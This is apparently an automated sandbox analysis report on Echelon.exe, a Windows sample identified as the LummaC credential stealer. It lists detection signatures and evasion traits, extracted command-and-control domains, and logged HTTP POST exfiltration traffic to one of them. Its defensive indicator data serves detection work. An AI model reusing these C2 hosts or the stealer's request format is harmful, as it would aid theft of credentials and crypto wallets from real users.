Windows Analysis Report
Echelon.exe

Overview

General Information

Sample name: Echelon.exe
Analysis ID: 1579580
MD5: cbdef49d32cf66bfa4c8a86d225b11bd
SHA1: bc2ce52834c6a615a8bd5d3b6aafd25239d03b44
SHA256: 4e6c7876342928a4ca103e27e2a0823c0e8df2457ba32e5d62fcf94cb111a477
Tags: exe, user-aachum

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Echelon.exe (PID: 3356 cmdline: "C:\Users\user\Desktop\Echelon.exe" MD5: CBDEF49D32CF66BFA4C8A86D225B11BD)
  • cleanup
{"C2 url": ["dwell-exclaim.biz", "print-vexer.biz", "covery-mover.biz", "formy-spill.biz", "impend-differ.biz", "se-blurry.biz", "zinc-sneark.biz", "dare-curbys.biz", "erectystickj.click"], "Build id": "yau6Na--1816906785"}
Yara matches (PCAP):

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Yara matches (memory dumps):

Source | Rule | Description | Author | Strings
00000000.00000003.2250780193.0000000001669000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x4acdd:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49; 0x4e273:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: Echelon.exe PID: 3356 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Echelon.exe PID: 3356 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Suricata alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T02:29:11.940959+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:13.994762+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:16.322446+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:18.572983+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49712 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:21.593774+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49716 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:24.823919+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49723 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:27.744190+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49733 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:30.348810+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49740 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:12.685320+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:14.749911+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:12.685320+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:14.749911+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:25.618042+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 172.67.154.166 | 443 | TCP

              AV Detection

Source: Echelon.exe.3356.0.memstrmin, Malware Configuration Extractor: LummaC {"C2 url": ["dwell-exclaim.biz", "print-vexer.biz", "covery-mover.biz", "formy-spill.biz", "impend-differ.biz", "se-blurry.biz", "zinc-sneark.biz", "dare-curbys.biz", "erectystickj.click"], "Build id": "yau6Na--1816906785"}
Source: Echelon.exe, Virustotal: Detection: 58%
Source: Echelon.exe, ReversingLabs: Detection: 50%
Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, String decryptor output:
  • impend-differ.biz
  • print-vexer.biz
  • dare-curbys.biz
  • covery-mover.biz
  • formy-spill.biz
  • dwell-exclaim.biz
  • zinc-sneark.biz
  • se-blurry.biz
  • erectystickj.click
  • lid=%s&j=%s&ver=4.0
  • TeslaBrowser/5.5
  • - Screen Resoluton:
  • - Physical Installed Memory:
  • Workgroup: -
  • yau6Na--1816906785
Source: Echelon.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: Echelon.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Echelon.exe, Binary string: I:\lokibit\cpp\VSEncryptor\Win32\Release\VSEncryptor.pdb

              Networking

Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49707 -> 172.67.154.166:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 172.67.154.166:443
Source: Network traffic, Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49723 -> 172.67.154.166:443
Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49708 -> 172.67.154.166:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 172.67.154.166:443
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.154.166:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.154.166:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.154.166:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49723 -> 172.67.154.166:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 172.67.154.166:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 172.67.154.166:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49740 -> 172.67.154.166:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49733 -> 172.67.154.166:443
Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: erectystickj.click
Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 52 | Host: erectystickj.click
Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=68TR9TI6M5OBM | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12810 | Host: erectystickj.click
Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=17ILINSQ6U41R2E | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15064 | Host: erectystickj.click
Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=4OZW1KMF1ZD | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20530 | Host: erectystickj.click
Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=FIS1F4GASLGQZWSM | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1252 | Host: erectystickj.click
Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=9ZAVLE8JOVKM | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 570028 | Host: erectystickj.click
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: erectystickj.click
Source: unknown, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: erectystickj.click
Source: Echelon.exe, String found in binary or memory: http://www.lokibit.com
Source: Echelon.exe, 00000000.00000003.2277367726.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2276635790.000000000166E000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000002.2321403698.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2317978549.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000002.2321403698.00000000015F8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://erectystickj.click/
Source: Echelon.exe, 00000000.00000002.2322552088.000000000450A000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000002.2321403698.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2317978549.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165457018.000000000165B000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2293376252.000000000450A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://erectystickj.click/api
Source: Echelon.exe, 00000000.00000003.2241658270.0000000004508000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2241853994.0000000004508000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2241744012.0000000004508000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2244207712.000000000450A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://erectystickj.click/api3K
Source: Echelon.exe, 00000000.00000002.2322552088.000000000450A000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2276225371.000000000450A000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2280744837.000000000450A000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2293376252.000000000450A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://erectystickj.click/apiZK
Source: Echelon.exe, 00000000.00000003.2317978549.000000000164F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://erectystickj.click/j
Source: Echelon.exe, 00000000.00000003.2294045335.000000000165F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://erectystickj.click:443/api
Source: unknown, Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown, Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown, Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown, Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49723

              System Summary

Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: Echelon.exe, Static PE information: invalid certificate
Source: Echelon.exe, 00000000.00000002.2320963707.0000000000E94000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenameVSEncryptor.exe8 vs Echelon.exe
Source: Echelon.exe, 00000000.00000003.2118073064.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameVSEncryptor.exe8 vs Echelon.exe
Source: Echelon.exe, Binary or memory string: OriginalFilenameVSEncryptor.exe8 vs Echelon.exe
Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
Source: Echelon.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Echelon.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Echelon.exe, 00000000.00000003.2189014684.0000000004489000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166287699.00000000044A5000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166558918.0000000004488000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Echelon.exeVirustotal: Detection: 58%
              Source: Echelon.exeReversingLabs: Detection: 50%
              Source: Echelon.exeString found in binary or memory: </LAUNCH_ICON>
              Source: Echelon.exeString found in binary or memory: </LAUNCH_BTN>
              Source: C:\Users\user\Desktop\Echelon.exeFile read: C:\Users\user\Desktop\Echelon.exeJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: oledlg.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: version.dllJump to behavior
              Source: Echelon.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: Echelon.exeStatic file information: File size 6689112 > 1048576
              Source: Echelon.exeStatic PE information: section name: RT_CURSOR
              Source: Echelon.exeStatic PE information: section name: RT_BITMAP
              Source: Echelon.exeStatic PE information: section name: RT_ICON
              Source: Echelon.exeStatic PE information: section name: RT_MENU
              Source: Echelon.exeStatic PE information: section name: RT_DIALOG
              Source: Echelon.exeStatic PE information: section name: RT_STRING
              Source: Echelon.exeStatic PE information: section name: RT_ACCELERATOR
              Source: Echelon.exeStatic PE information: section name: RT_GROUP_ICON
              Source: Echelon.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3ac000
              Source: Echelon.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x15cc00
              Source: Echelon.exeStatic PE information: More than 200 imports for USER32.dll
              Source: Echelon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: Echelon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: Echelon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: Echelon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Echelon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: Echelon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: Echelon.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: I:\lokibit\cpp\VSEncryptor\Win32\Release\VSEncryptor.pdb source: Echelon.exe
              Source: Echelon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: Echelon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: Echelon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: Echelon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: Echelon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: Echelon.exeStatic PE information: real checksum: 0x14fdc27 should be: 0x662ee4
              Source: C:\Users\user\Desktop\Echelon.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\Echelon.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exe TID: 764Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exe TID: 3136Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: Echelon.exe, 00000000.00000002.2321403698.00000000015D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188527203.0000000004523000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: Echelon.exe, 00000000.00000002.2321403698.00000000015F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: Echelon.exe, 00000000.00000003.2188683219.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: Echelon.exe, 00000000.00000003.2188527203.0000000004523000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
